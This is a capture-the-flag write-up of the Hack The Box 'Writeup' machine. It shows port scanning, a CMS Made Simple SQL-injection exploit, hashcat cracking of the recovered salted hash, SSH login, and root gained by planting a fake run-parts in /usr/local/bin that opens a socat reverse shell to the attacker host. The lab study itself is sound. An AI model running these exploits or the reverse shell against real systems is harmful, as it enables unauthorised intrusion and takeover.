Pages

Search

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138

Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-16 21:59 CEST
Nmap scan report for 10.10.10.138
Host is up (0.042s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.74 seconds

Although nmap says port 80 is open, it also appears to be as tcpwrapped.
What does it mean?

Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux.

When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper.

Specifically, it means that a full TCP handshake was completed, but the remote host closed the connection without receiving any data.
It is important to note that tcpwrapper protects programs, not ports.

This means that a valid (not false-positive) tcpwrapped response indicates a real network service is available, but you are not on the list of hosts allowed to talk with it.

When a very large number of ports are shown as tcpwrapped, it is unlikely that they represent real services, so the behaviour probably means something else like a load balancer or firewall is intercepting the connection requests.

https://secwiki.org/w/FAQ_tcpwrapped

Access to http://10.10.10.138

Eeyore DoS protection script?

We’ve found this page.

http://10.10.10.138/writeup/

According to this data,

GET http://10.10.10.138/writeup/index.php?page=writeup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://10.10.10.138/writeup/
Host: 10.10.10.138
Cookie: CMSSESSID9d372ef93962=c5esgjkeaerfa215rs0119gat7

There is a Cookie called: CMSSESSID9d372ef93962

We could use wpscan to try to guess what cms are we targeting, but in this case, it is just as easy as check the source code of the web page.

http://www.cmsmadesimple.org/
CMS Made simple

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

On Google: CMS Made simple 2019

https://www.exploit-db.com/exploits/46635

$ python3 46635.py --url 
http://10.10.10.138/writeup/ --wordlist
/usr/share/wordlists/rockyou.txt     

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

According to the script code, the password found will be obtained as an MD5 Hash. Hashcat can be used to crack it.

To be able to do it we also need the salt for the password found.

$ echo "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807" > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4376/4440 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5($salt.$pass)
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sat Oct 17 17:22:23 2020 (8 secs)
Time.Estimated...: Sat Oct 17 17:22:31 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   577.3 kH/s (1.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4358144/14344385 (30.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: raynerleow -> raygan96

Started: Sat Oct 17 17:21:19 2020
Stopped: Sat Oct 17 17:22:32 2020

Password is : raykayjay9

So we have obtained user and password.
jkr:raykayjay9

$ ssh jkr@10.10.10.138

The authenticity of host '10.10.10.138 (10.10.10.138)' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.138' (ECDSA) to the list of known hosts.
jkr@10.10.10.138's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$

jkr@writeup:~$ ls

user.txt

jkr@writeup:~$ cat user.txt

d4e4XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Run Linpeas:

jkr@writeup:~$ wget http://10.10.14.25:8080/linpeas.sh

--2020-10-17 15:56:38--  http://10.10.14.25:8080/linpeas.sh
Connecting to 10.10.14.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 293431 (287K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                            100%[=======================================================================>] 286.55K   579KB/s    in 0.5s    

2020-10-17 15:56:39 (579 KB/s) - ‘linpeas.sh’ saved [293431/293431]

jkr@writeup:~$ chmod +x linpeas.sh
jkr@writeup:~$ ./linpeas.sh

Starting linpeas. Caching Writable Folders...
...

Analyzing the results we see that user jkr also belongs to group staff.

...
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
...

It is not a default group.
https://wiki.debian.org/SystemGroups

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may «override» the executables in /bin and /usr/bin with the same name). Compare with group «adm», which is more related to monitoring/security.

Group staff writable groups are:

[+] Interesting GROUP writable files (not in Home) (max 500)
...
/var/local                      
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
...

Based on the PATH variable,

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

/usr/local/bin is before /bin

Now let’s run pspy:

jkr@writeup:~$ wget http://10.10.14.25:8080/pspy64

--2020-10-17 16:51:47--  http://10.10.14.25:8080/pspy64
Connecting to 10.10.14.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                100%[=======================================================================>]   2.94M  6.53MB/s    in 0.4s    

2020-10-17 16:51:48 (6.53 MB/s) - ‘pspy64’ saved [3078592/3078592]

https://github.com/DominicBreuker/pspy

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

2020/10/17 17:06:01 CMD: UID=0    PID=17592  | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
2020/10/17 17:06:19 CMD: UID=0    PID=17593  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=0    PID=17594  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                                                    
2020/10/17 17:06:19 CMD: UID=0    PID=17595  | run-parts --lsbsysinit /etc/update-motd.d 
2020/10/17 17:06:19 CMD: UID=0    PID=17596  | /bin/sh /etc/update-motd.d/10-uname 
2020/10/17 17:06:19 CMD: UID=0    PID=17597  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=1000 PID=17598  | sshd: jkr@pts/1   
2020/10/17 17:06:19 CMD: UID=1000 PID=17600  | -bash

When we log in from another ssh connection with user jkr, command run-parts is executed from a relative path.

This is important because it is when the PATH variable takes action.
when an absolute path is used, there is no need to use the PATH variable. The system knows where to find the command.

However, if a relative path is used, the system needs to check the PATH variable to find the first path that contains the required command.

In this case, if we create a run-parts command, when a new ssh connection is performed, this command will be executed.

Let’s create a known and «nice» run-parts command:

jkr@writeup:/tmp$ nano run-parts

#!/bin/bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.7:4242

jkr@writeup:/tmp$ chmod +x run-parts
jkr@writeup:/tmp$ cp run-parts /usr/local/bin/
ssh jkr@10.10.10.138

jkr@10.10.10.138's password:

socat file:tty,raw,echo=0 TCP-L:4242

root@writeup:/#

root@writeup:/# whoami

root

root@writeup:/# cat /root/root.txt

eebaXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *